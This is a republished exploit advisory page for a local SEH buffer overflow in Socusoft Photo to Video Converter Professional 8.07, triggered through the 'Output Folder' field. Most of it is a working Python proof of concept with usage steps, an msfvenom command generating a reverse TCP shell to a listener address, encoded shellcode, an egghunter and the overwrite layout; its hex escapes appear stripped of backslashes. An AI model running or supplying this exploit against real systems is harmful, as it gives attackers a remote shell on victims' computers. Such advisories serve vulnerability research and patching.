Exploit/Advisories

Published on July 26th, 2020 📆 | 4287 Views ⚑

0

Socusoft Photo to Video Converter Professional 8.07 – ‘Output Folder’ Buffer Overflow (SEH Egghunter)


iSpeech

# Exploit Title: Socusoft Photo to Video Converter Professional 8.07 - 'Output Folder' Buffer Overflow (SEH Egghunter)
# Date: 2020-07-23
# Exploit Author: MasterVlad
# Vendor Homepage: http://www.dvd-photo-slideshow.com/photo-to-video-converter.html
# Software Link: https://www.exploit-db.com/apps/ea1720441edd5990a9d0d1ed564a507e-photo-to-video-pro.exe
# Version: 8.07
# Vulnerability Type: Local Buffer Overflow
# Tested on: Windows 10 x64

# Proof of Concept:

# 1. Run the python script
# 2. Open exploit.txt and copy the content to clipboard
# 3. Open Socusoft Photo to Video Converter Professional 8.07 and go to Video Output
# 4. Paste the clipboard into the 'Output Folder' field and click on Open

#!/usr/bin/python

# Badchars: 22, 2a, 3a, 3c, 3e, 3f, 7c + Non-ascii

# msfvenom -p windows/shell_reverse_tcp LHOST=192.168.164.129 LPORT=443 -b "x00x0ax0dx22x2ax3ax3cx3ex3fx7c" -f py -e x86/alpha_mixed BufferRegister=EDI

buf =  ""
buf += "x57x59x49x49x49x49x49x49x49x49x49x49x49"
buf += "x49x49x49x49x49x37x51x5ax6ax41x58x50x30"
buf += "x41x30x41x6bx41x41x51x32x41x42x32x42x42"
buf += "x30x42x42x41x42x58x50x38x41x42x75x4ax49"
buf += "x4bx4cx49x78x6dx52x55x50x65x50x37x70x53"
buf += "x50x6bx39x48x65x54x71x4bx70x45x34x6cx4b"
buf += "x52x70x44x70x6ex6bx52x72x54x4cx6cx4bx42"
buf += "x72x66x74x4ex6bx72x52x65x78x46x6fx6cx77"
buf += "x52x6ax74x66x45x61x6bx4fx6ex4cx45x6cx45"
buf += "x31x33x4cx55x52x34x6cx51x30x4fx31x4ax6f"
buf += "x54x4dx46x61x39x57x5ax42x48x72x32x72x52"
buf += "x77x6cx4bx30x52x32x30x4cx4bx72x6ax45x6c"
buf += "x6ex6bx52x6cx42x31x42x58x79x73x57x38x76"
buf += "x61x4ex31x32x71x4cx4bx63x69x31x30x33x31"
buf += "x58x53x6ex6bx52x69x34x58x4bx53x64x7ax30"
buf += "x49x4ex6bx36x54x4ex6bx63x31x69x46x55x61"
buf += "x79x6fx4ex4cx4bx71x7ax6fx54x4dx46x61x78"
buf += "x47x55x68x39x70x31x65x39x66x74x43x53x4d"
buf += "x59x68x47x4bx51x6dx66x44x61x65x78x64x56"
buf += "x38x6ex6bx61x48x37x54x76x61x6bx63x31x76"
buf += "x4cx4bx66x6cx72x6bx4ex6bx71x48x35x4cx33"
buf += "x31x68x53x6ex6bx75x54x4cx4bx56x61x6ax70"
buf += "x6cx49x32x64x74x64x44x64x73x6bx31x4bx70"
buf += "x61x53x69x30x5ax63x61x6bx4fx49x70x33x6f"
buf += "x31x4fx31x4ax4cx4bx37x62x48x6bx4ex6dx63"
buf += "x6dx31x78x45x63x44x72x57x70x57x70x42x48"
buf += "x30x77x44x33x45x62x33x6fx33x64x30x68x50"
buf += "x4cx34x37x44x66x53x37x79x6fx68x55x4ex58"
buf += "x6ax30x63x31x53x30x33x30x75x79x68x44x42"
buf += "x74x46x30x71x78x71x39x6dx50x42x4bx77x70"
buf += "x79x6fx59x45x62x70x56x30x76x30x32x70x37"
buf += "x30x56x30x31x50x66x30x53x58x78x6ax76x6f"
buf += "x49x4fx6bx50x6bx4fx6ex35x6cx57x33x5ax34"
buf += "x45x61x78x59x50x4fx58x39x34x6ex61x70x68"
buf += "x75x52x67x70x63x31x6fx4bx6dx59x6ax46x61"
buf += "x7ax56x70x62x76x73x67x53x58x6dx49x69x35"
buf += "x64x34x43x51x69x6fx6ex35x6bx35x4bx70x72"
buf += "x54x76x6cx39x6fx62x6ex65x58x64x35x6ax4c"
buf += "x55x38x5ax50x4ex55x4cx62x30x56x4bx4fx4a"
buf += "x75x63x58x70x63x50x6dx70x64x47x70x6bx39"
buf += "x6bx53x43x67x51x47x62x77x45x61x6ax56x43"
buf += "x5ax46x72x32x79x43x66x39x72x79x6dx61x76"
buf += "x4bx77x61x54x76x44x55x6cx66x61x63x31x6e"
buf += "x6dx43x74x76x44x74x50x4bx76x45x50x32x64"
buf += "x71x44x52x70x66x36x73x66x30x56x52x66x31"
buf += "x46x42x6ex62x76x51x46x43x63x73x66x71x78"
buf += "x50x79x38x4cx67x4fx4ex66x6bx4fx69x45x6c"
buf += "x49x6bx50x42x6ex63x66x42x66x59x6fx64x70"
buf += "x70x68x36x68x6dx57x75x4dx51x70x79x6fx58"
buf += "x55x6dx6bx5ax50x48x35x4ex42x76x36x52x48"
buf += "x4dx76x4fx65x4dx6dx6fx6dx79x6fx4ax75x57"
buf += "x4cx77x76x71x6cx57x7ax4dx50x69x6bx69x70"
buf += "x31x65x65x55x4fx4bx72x67x67x63x31x62x72"
buf += "x4fx53x5ax75x50x72x73x6bx4fx5ax75x41x41"



egg = "x25x4Ax4Dx4Ex54x25x35x32x31x2Bx54x58x66x05x2Cx09x50x5c"
egg += "x25x4Ax4Dx4Ex54x25x35x32x31x2Bx2Dx7Fx01x7Fx01x2Dx0Bx01x7Fx01x2Dx01x16x02x15x50"
egg += "x25x4Ax4Dx4Ex54x25x35x32x31x2Bx2Dx01x7Fx01x01x2Dx50x0Bx14x4Fx50"
egg += "x25x4Ax4Dx4Ex54x25x35x32x31x2Bx2Dx7Fx7Fx01x01x2Dx51x29x73x04x50"
egg += "x25x4Ax4Dx4Ex54x25x35x32x31x2Bx2Dx01x01x2Cx50x2Dx10x46x7Fx7Fx50"
egg += "x25x4Ax4Dx4Ex54x25x35x32x31x2Bx2Dx45x7Bx26x0Cx2Dx7Fx7Fx7Fx7Fx50"
egg += "x25x4Ax4Dx4Ex54x25x35x32x31x2Bx2Dx7Fx28x01x52x2Dx7Fx7Fx31x7Fx50"
egg += "x25x4Ax4Dx4Ex54x25x35x32x31x2Bx2Dx72x4Dx3Dx16x2Dx7Fx70x70x7Fx50"
egg += "x25x4Ax4Dx4Ex54x25x35x32x31x2Bx2Dx1Ax7Bx01x7Fx2Dx7Fx01x33x7Fx2Dx01x02x01x02x50"

exploit = "A"*304
exploit += "x74x06x75x04"
# 0x10047a1e
exploit += "x1ex7ax04x10"
exploit += egg
exploit += "B"*(2000-312-len(egg))
exploit += "T00WT00W"
exploit += buf

f = open("exploit.txt", "w")
f.write(exploit)
f.close()





Source link

Tagged with:



Comments are closed.






© Torchsec  Privacy Policy Disclaimer  T&C



Back to Top ↑